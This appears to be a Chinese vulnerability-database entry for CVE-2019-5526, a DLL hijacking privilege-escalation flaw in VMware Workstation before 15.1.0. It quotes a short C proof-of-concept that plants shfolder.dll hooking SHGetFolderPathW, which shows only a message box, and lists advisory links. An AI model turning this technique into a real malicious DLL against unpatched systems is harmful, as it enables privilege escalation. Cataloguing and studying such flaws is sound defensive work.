VMware Workstation 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1610028 漏洞类型 权限许可和访问控制问题
发布时间 2019-05-14 更新时间 2019-05-14
CVE编号 CVE-2019-5526 CNNVD-ID CNNVD-201905-625
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://www.securityfocus.com/bid/108333
https://cxsecurity.com/issue/WLB-2019050181
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201905-625
|漏洞详情
VMware Workstation是美国威睿(VMware)公司的一套虚拟机软件。该软件提供可以同时运行多个不同的操作系统的虚拟机功能。 VMware Workstation 15.1.0之前的15.x版本中存在DLL劫持漏洞,该漏洞源于程序没有正确地加载DLL文件。攻击者可利用该漏洞将权限提升至管理员。
|漏洞EXP
#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Date: 2019-05-14
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------


Description:

VMware Workstation contains a DLL hijacking issue because some DLL.


DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()

------Code_Poc-------
#include "dll.h"
#include <windows.h>

DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}

--------------------------


https://www.vmware.com/security/advisories/VMSA-2019-0007.html
|受影响的产品
VMWare Workstation Pro 15.1 VMWare Workstation Player 15.1 VMWare Workstation 15.1
|参考资料

来源:www.securityfocus.com

链接:http://www.securityfocus.com/bid/108333


来源:www.vmware.com

链接:http://www.vmware.com


来源:blogs.technet.com

链接:http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx


来源:blog.metasploit.com

链接:http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html


来源:blog.rapid7.com

链接:http://blog.rapid7.com/?p=5325


来源:www.vmware.com

链接:https://www.vmware.com/security/advisories/VMSA-2019-0007.html


来源:www.auscert.org.au

链接:https://www.auscert.org.au/bulletins/80962


来源:vigilance.fr

链接:https://vigilance.fr/vulnerability/VMware-Workstation-executing-DLL-code-29307


来源:www.securityfocus.com

链接:https://www.securityfocus.com/bid/108333


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-5526